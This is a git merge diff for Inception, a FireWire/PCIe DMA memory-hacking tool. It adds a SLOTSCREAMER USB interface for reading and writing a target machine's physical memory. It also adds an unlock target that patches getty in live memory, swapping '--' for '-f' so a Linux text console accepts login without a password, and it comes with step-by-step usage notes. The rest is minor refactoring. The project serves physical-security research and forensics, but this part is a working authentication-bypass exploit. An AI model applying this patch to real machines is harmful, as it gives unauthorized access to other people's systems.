Merge branch 'rexploit-master'

* rexploit-master:
  Fixed some minor issues and merged SLOTSCREAMER
  Added slotscreamer interface and a generic Getty signature

incept

@@ -32,6 +32,7 @@ import traceback
 import pkgutil
 
 import inception.modules
+import inception.interfaces
 
 from inception import cfg, util, terminal, sound, memory
 from inception.exceptions import InceptionException
@@ -122,10 +123,14 @@ def main(argv):
             prog = sys.argv[0]
             pkgpath = os.path.dirname(inception.modules.__file__)
             modules = [name for _, name, _ in pkgutil.iter_modules([pkgpath])]
-            epilog = ('Available modules: {}. For module-specific help, '
-                      'type: {} [module name] -h/--help'
-                      .format(', '.join(modules), prog))
-            parser.epilog = epilog
+            pkgpath = os.path.dirname(inception.interfaces.__file__)
+            ifaces = [name for _, name, _ in pkgutil.iter_modules([pkgpath])]
+            parser.epilog = ('Available modules: {}. '
+                             'For module-specific help, '
+                             'type: {} [module name] -h/--help. '
+                             'Available interfaces: {}.'
+                             .format(', '.join(modules), prog,
+                                     ', '.join(ifaces)))
 
             command = sys.argv[1]
             if not command.startswith('-'):
@@ -177,7 +182,11 @@ def main(argv):
     except InceptionException as e:
         term.error(e)
 
-    # Catch whatever that hasn't been catched elsewhere
+    # Catch FireWire-related exeptions
+    except IOError as e:
+        term.error(e)
+
+    # Catch whatever that hasn't been catched elsewhere and print stack trace
     except Exception as e:
         term.warn('Something went dreadfully wrong, full stack trace below: '
                   '{0}'.format(e))

inception/interfaces/slotscreamer.py

@@ -0,0 +1,136 @@
+'''
+Inception - a FireWire physical memory manipulation and hacking tool exploiting
+IEEE 1394 SBP-2 DMA.
+
+Copyright (C) 2011-2013  Carsten Maartmann-Moe
+
+This program is free software: you can redistribute it and/or modify
+it under the terms of the GNU General Public License as published by
+the Free Software Foundation, either version 3 of the License, or
+(at your option) any later version.
+
+This program is distributed in the hope that it will be useful,
+but WITHOUT ANY WARRANTY; without even the implied warranty of
+MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
+GNU General Public License for more details.
+
+You should have received a copy of the GNU General Public License
+along with this program.  If not, see <http://www.gnu.org/licenses/>.
+
+This module provides the ability to use inception using SLOTSCREAMER.
+Most of the code is adopted from the slotscreamer samples with slight 
+modification.
+
+Created on Jan 16th, 2015
+
+@author: Inception Carsten Maartmann-Moe <carsten@carmaa.com> aka ntropy
+
+The SLOTSCREAMER project is part of the NSA-Playset and is available at:
+
+https://github.com/NSAPlayset/SLOTSCREAMER
+
+SLOTSCREAMER initial authors: Joe Fitz - joefitz@securinghardware.com and
+Miles Crabilll - miles@milescrabill.com
+'''
+
+from inception import cfg, terminal
+from inception.exceptions import InceptionException
+
+import usb.core
+import usb.util
+import struct
+
+
+term = terminal.Terminal()
+
+
+def initialize(opts, module):
+    # Convenience function to initialize the interface.
+
+    # Mandatory arguments:
+
+    # Lower DMA shield, and set memsize
+    device = SlotScreamer()
+    memsize = cfg.memsize
+    return device, memsize
+
+
+class SlotScreamer:
+    # Interface to the SlotScreamer native PCIe device over USB with pyusb
+
+    def __init__(self):
+
+        # find our device
+        try:
+            dev = usb.core.find(idVendor=0x0525, idProduct=0x3380)
+        except ValueError:
+            raise InceptionException('SLOTSCREAMER device not found')
+        dev.set_configuration()
+        cfg = dev.get_active_configuration()
+        intf = cfg[0, 0]
+
+        self.pciin = usb.util.find_descriptor(intf, custom_match=lambda e: e.bEndpointAddress==0x8e)
+        assert self.pciin is not None, 'SLOTSCREAMER pciin endpoint not found'
+        term.info('SLOTSCREAMER PCIIN found: '+str(self.pciin)+'\n')
+
+        self.pciout = usb.util.find_descriptor(intf, custom_match=lambda e: e.bEndpointAddress==0xe)
+        assert self.pciout is not None, 'pciout endpoint not found'
+        term.info('SLOTSCREAMER PCIOUT found: '+str(self.pciout)+'\n')
+        self.cache=[]
+
+    def read(self, addr, numb, buf=None):
+        try:
+            # round down to multiple of 256
+            offset = addr % 256
+            baseAddress = addr - offset
+            endOffset = (addr+numb) % 256
+            endAddress = addr + numb - offset+256
+            # cache most recent read
+            # check if anything is cached
+            if (len(self.cache)>0):
+                if((self.cacheBase<=addr)and((self.cacheBase+len(self.cache))>(addr+numb))):
+                    return bytes(self.cache[(addr-self.cacheBase):(addr+numb)-self.cacheBase])
+            self.cache=[]
+            self.cacheBase=baseAddress
+            while baseAddress<endAddress:
+                self.pciout.write(struct.pack('BBBBI',0xcf,0,0,0x40,baseAddress))
+                self.cache+=self.pciin.read(0x100)
+                baseAddress+=256
+        except IOError:
+            self.cache=[]
+            return bytes(b"bad" + b"\x10") * 64
+        return bytes(self.cache[offset:offset+numb])
+
+    def readv(self,req):
+        # sort requests so sequential reads are cached
+        #req.sort()
+        for r in req:
+            yield(r[0], self.read(r[0],r[1]))
+
+    def write(self, addr, buf):
+        offset=addr%256
+        baseAddress=addr-offset
+        byteCount=len(buf)
+        endOffset=(addr+byteCount)%256
+        endAddress=addr+byteCount-endOffset+256
+
+        #readbuffer 
+        readbuf=bytearray(self.read(baseAddress,endAddress-baseAddress))
+
+        #modify buffer 
+        for i in range(offset,endOffset):
+            readbuf[i]=buf[i-offset]
+
+        #writebuffer
+        bufferIndex=0
+        while baseAddress<endAddress:
+            subbuf=readbuf[bufferIndex:bufferIndex+128]
+            self.pciout.write(struct.pack('BBBBI'+'B'*128,0x4f,0,0,0x20,baseAddress,*subbuf))
+            baseAddress+=128
+            bufferIndex+=128
+
+        global cache
+        self.cache=[]
+
+    def close(self):
+        self.cache=[]

inception/memory.py

@@ -293,8 +293,7 @@ def find(self, target, findtag=False, findall=False, verbose=False):
 
         # Progress bar
         prog = term.ProgressBar(max_value=self.memsize,
-                                total_width=term.wrapper.width,
-                                print_data=verbose)
+                                total_width=term.wrapper.width)
         prog.draw()
 
         try:

inception/modules/dump.py

@@ -136,8 +136,7 @@ def run(opts, memspace):
 
     # Progress bar
     prog = term.ProgressBar(min_value=start, max_value=end,
-                            total_width=term.wrapper.width,
-                            print_data=opts.verbose)
+                            total_width=term.wrapper.width)
 
     if size < cfg.max_request_size:
         requestsize = size

inception/modules/unlock.py

@@ -522,7 +522,35 @@
                     ]
                 )
             ]
-        )
+        ),
+    Target(
+     name='Generic Linux Getty preauthenticated patch',
+     note='The last command parameter to getty "--" is preventing commmand injection in the shell.'
+     ' This can be replace to "-f" which results in the user beeing preauthenticated.'
+     ' Getty is used to login on a text console on most Linux systems. GDM, KDM or pam is not affected.'
+     ' When the patch is applied, switch to a text console (on most ditros using Ctrl+Alt+F2) and login without requiring a password.'
+     ' If you want to target another Linux system; dump the memory, use a hex editor to search for the chunk and'
+     ' enter the pageoffset in the offset field below and rerun inception.',
+     signatures=[
+         Signature(
+             os='Linux',
+             os_versions=['Most'],
+             os_architectures=['x86', 'x64'],
+             executable=None,
+             version=None,
+             md5=None,
+             tag=True,
+             offsets=[0x892],
+             chunks=[
+                 Chunk(
+                     chunk=0x2d2d0025733a206361,
+                     chunkoffset=0x00,
+                     patch=0x66,
+                     patchoffset=0x01)
+                 ]
+             )
+         ]
+     )
     ]
 
 

inception/terminal.py

@@ -132,7 +132,7 @@ class ProgressBar:
         '''
 
         def __init__(self, min_value=0, max_value=100, total_width=80,
-                     print_data=False):
+                     print_data=True):
             '''
             Initializes the progress bar
             '''

inception/test/test_memory.py

@@ -226,7 +226,7 @@ def test_patch(self):
         memspace = memory.MemorySpace(device, memsize)
         address = 0x00000042
         read = memspace.read(address, 4)
-        backup = memspace.patch(address, sig.chunks)
+        memspace.patch(address, sig)
         sys.stdout = sys.__stdout__  # Restore output
         read_back = memspace.read(address, 4)
         # print(read_back)

setup.py

@@ -52,7 +52,7 @@
     download_url='http://github.com/carmaa/inception',
     license='GPL',
     requires=['forensic1394'],
-    install_requires=['msgpack-python'],
+    install_requires=['msgpack-python', 'pyusb'],
     keywords=['hack', 'physical security', 'firewire', 'pci'],
     classifiers=[
         'Programming Language :: Python',